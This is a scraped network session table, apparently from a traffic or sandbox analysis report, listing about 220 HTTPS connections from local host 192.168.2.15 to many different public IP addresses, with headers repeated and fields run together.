                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19179192.168.2.1541054122.230.219.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19180192.168.2.154765835.48.115.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19181192.168.2.154643212.199.152.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19182192.168.2.1538574194.131.55.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19183192.168.2.1551420129.127.31.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19184192.168.2.155502477.151.6.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19185192.168.2.1547184102.216.155.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19186192.168.2.154469681.119.25.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19187192.168.2.1538348167.16.144.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19188192.168.2.1533560102.213.101.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19189192.168.2.15434242.85.35.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19190192.168.2.153376077.240.115.42443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19191192.168.2.155244674.69.250.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19192192.168.2.1560356140.82.96.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19193192.168.2.153314466.24.173.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19194192.168.2.154594891.142.152.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19195192.168.2.156050843.94.22.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19196192.168.2.1538548155.104.196.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19197192.168.2.1545598194.116.211.105443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19198192.168.2.1544218180.196.241.184443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19199192.168.2.153436625.124.214.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19200192.168.2.1543050207.6.24.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19201192.168.2.155111046.209.140.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19202192.168.2.1560084129.41.220.139443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19203192.168.2.154283661.88.117.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19204192.168.2.1560826201.164.78.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19205192.168.2.154812495.221.192.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19206192.168.2.1553864219.126.64.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19207192.168.2.1534068194.203.97.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19208192.168.2.1551172131.207.198.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19209192.168.2.1535772130.201.172.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19210192.168.2.1537450107.140.101.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19211192.168.2.1534044216.208.147.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19212192.168.2.1545280163.3.45.99443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19213192.168.2.154511869.0.134.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19214192.168.2.1553508150.234.26.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19215192.168.2.154889474.30.71.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19216192.168.2.1558060213.167.251.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19217192.168.2.1539050187.110.93.101443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19218192.168.2.1542930168.248.195.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19219192.168.2.1534258221.5.229.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19220192.168.2.1558156146.48.157.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19221192.168.2.1545126191.20.49.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19222192.168.2.1550616178.36.159.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19223192.168.2.1538642112.215.245.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19224192.168.2.1553698220.192.70.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19225192.168.2.1550534131.174.226.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19226192.168.2.1546808206.1.21.93443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19227192.168.2.1544262165.224.157.116443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19228192.168.2.1537086155.192.103.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19229192.168.2.1542742128.152.252.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19230192.168.2.1534250209.153.2.4443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19231192.168.2.1550600205.84.128.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19232192.168.2.1550796123.225.79.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19233192.168.2.155763298.26.113.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19234192.168.2.1541748151.220.250.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19235192.168.2.153889452.199.83.2443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19236192.168.2.1539778148.136.10.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19237192.168.2.1555004118.180.94.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19238192.168.2.155247434.208.38.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19239192.168.2.1559978223.32.233.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19240192.168.2.156074262.202.128.134443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19241192.168.2.1544558101.202.142.189443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19242192.168.2.1556152222.172.25.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19243192.168.2.1551442128.19.184.161443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19244192.168.2.1554798199.152.110.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19245192.168.2.154003212.159.164.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19246192.168.2.1543160159.70.114.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19247192.168.2.1549270132.146.10.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19248192.168.2.1560638213.103.254.249443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19249192.168.2.154386092.6.240.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19250192.168.2.154314842.55.198.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19251192.168.2.1547292174.158.229.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19252192.168.2.1539910128.196.17.126443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19253192.168.2.154619040.38.127.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19254192.168.2.155155892.83.168.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19255192.168.2.155898627.160.174.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19256192.168.2.154502088.139.58.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19257192.168.2.154050668.28.14.160443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19258192.168.2.1539428182.14.250.211443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19259192.168.2.1556720206.217.152.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19260192.168.2.1536120202.242.10.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19261192.168.2.154138884.6.181.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19262192.168.2.1536064162.201.126.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19263192.168.2.1539396123.240.178.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19264192.168.2.1545742111.74.67.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19265192.168.2.153739020.219.176.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19266192.168.2.1540248209.108.241.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19267192.168.2.154638059.192.111.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19268192.168.2.1535792124.123.231.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19269192.168.2.155546896.145.246.117443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19270192.168.2.154526257.128.127.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19271192.168.2.1560278129.30.92.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19272192.168.2.153553071.42.86.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19273192.168.2.155838012.134.238.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19274192.168.2.1560412130.54.45.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19275192.168.2.155098673.214.176.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19276192.168.2.1549798125.116.244.168443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19277192.168.2.155666085.12.52.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19278192.168.2.154521878.219.207.178443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19279192.168.2.154057441.107.237.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19280192.168.2.1555012204.142.165.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19281192.168.2.1544522103.134.94.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19282192.168.2.155698477.160.42.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19283192.168.2.155015645.200.61.130443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19284192.168.2.155746023.106.43.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19285192.168.2.1548360140.217.139.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19286192.168.2.1557006130.63.140.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19287192.168.2.1546256168.77.222.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19288192.168.2.153578051.125.251.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19289192.168.2.1558160206.124.231.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19290192.168.2.1533414191.121.36.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19291192.168.2.155089092.177.242.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19292192.168.2.1537558138.32.84.235443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19293192.168.2.1540702191.3.255.48443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19294192.168.2.1548090162.125.137.194443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19295192.168.2.155936043.217.58.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19296192.168.2.153634490.55.161.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19297192.168.2.1533128198.193.19.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19298192.168.2.1554928170.176.84.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19299192.168.2.154362237.122.221.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19300192.168.2.1556910173.155.104.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19301192.168.2.154327048.41.84.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19302192.168.2.1545300151.191.140.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19303192.168.2.155391447.120.193.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19304192.168.2.155009493.66.8.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19305192.168.2.1552456165.145.157.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19306192.168.2.1544268117.135.215.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19307192.168.2.153873064.234.166.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19308192.168.2.1548428194.212.203.181443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19309192.168.2.155683053.135.150.240443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19310192.168.2.1550052191.100.211.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19311192.168.2.1560386222.163.121.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19312192.168.2.1543350110.144.157.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19313192.168.2.155735842.245.32.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19314192.168.2.1552602103.116.123.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19315192.168.2.1535334180.86.24.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19316192.168.2.1546834139.144.77.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19317192.168.2.1557238197.114.231.56443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19318192.168.2.1534450130.194.182.220443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19319192.168.2.1550798124.81.57.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19320192.168.2.155078050.1.224.107443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19321192.168.2.1552864157.148.136.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19322192.168.2.1547028133.107.37.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19323192.168.2.1560656184.51.238.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19324192.168.2.1557200136.205.94.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19325192.168.2.1540352130.100.113.124443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19326192.168.2.153711889.254.44.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19327192.168.2.15357944.211.120.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19328192.168.2.1542206207.50.70.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19329192.168.2.155004246.185.47.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19330192.168.2.153558223.137.78.231443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19331192.168.2.153566878.80.148.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19332192.168.2.155044867.209.238.210443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19333192.168.2.1541864146.95.193.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19334192.168.2.1544928134.66.96.207443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19335192.168.2.155709462.81.203.33443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19336192.168.2.155455054.92.206.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19337192.168.2.154242295.70.141.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19338192.168.2.1545452124.116.166.155443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19339192.168.2.1549210156.9.51.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19340192.168.2.1545830148.114.109.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19341192.168.2.1554252185.11.176.81443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19342192.168.2.15398029.143.140.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19343192.168.2.1555326108.191.74.17443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19344192.168.2.1558036199.244.78.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19345192.168.2.154613814.174.147.237443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19346192.168.2.1554066115.176.197.109443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19347192.168.2.1545820202.184.207.78443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19348192.168.2.1550854107.169.174.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19349192.168.2.1541342168.129.252.188443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19350192.168.2.1534208195.250.87.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19351192.168.2.1556478221.95.163.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19352192.168.2.1548062153.105.185.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19353192.168.2.1557896202.84.250.216443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19354192.168.2.154191642.215.156.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19355192.168.2.1560328219.26.217.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19356192.168.2.1547066182.215.173.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19357192.168.2.1553842191.73.250.29443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19358192.168.2.155735213.119.61.245443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19359192.168.2.153536473.103.254.21443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19360192.168.2.1536044138.31.248.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19361192.168.2.155782070.86.254.135443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19362192.168.2.15360309.17.7.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19363192.168.2.1557508194.52.99.136443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19364192.168.2.154170896.137.115.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19365192.168.2.153533878.4.149.187443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19366192.168.2.153863051.141.206.10443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19367192.168.2.1544434162.59.126.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19368192.168.2.1547820180.147.42.146443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19369192.168.2.1551136180.90.57.49443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19370192.168.2.1557384148.80.21.190443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19371192.168.2.1533762133.154.128.167443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19372192.168.2.1534938162.68.49.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19373192.168.2.1550162117.65.212.123443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19374192.168.2.1536398156.35.246.232443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19375192.168.2.1544626185.81.2.74443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19376192.168.2.1556170152.90.98.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19377192.168.2.154695261.219.88.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19378192.168.2.1550086223.196.55.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19379192.168.2.155696238.139.21.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19380192.168.2.1538712144.141.52.64443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19381192.168.2.1558862108.17.4.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19382192.168.2.1537102126.163.98.58443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19383192.168.2.1548168171.229.87.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19384192.168.2.1559694193.227.125.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19385192.168.2.1555178110.229.76.248443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19386192.168.2.1539994213.112.4.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19387192.168.2.155689852.151.198.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19388192.168.2.1551078188.72.175.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19389192.168.2.1553046113.80.246.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19390192.168.2.1560856138.54.220.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19391192.168.2.1560188219.254.103.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19392192.168.2.1552718166.179.143.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19393192.168.2.1554638188.57.71.68443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19394192.168.2.154277443.170.234.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19395192.168.2.154501824.207.234.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19396192.168.2.1533616195.31.99.219443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19397192.168.2.1555480166.123.107.43443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19398192.168.2.153626267.103.119.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            19399192.168.2.153607647.253.174.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
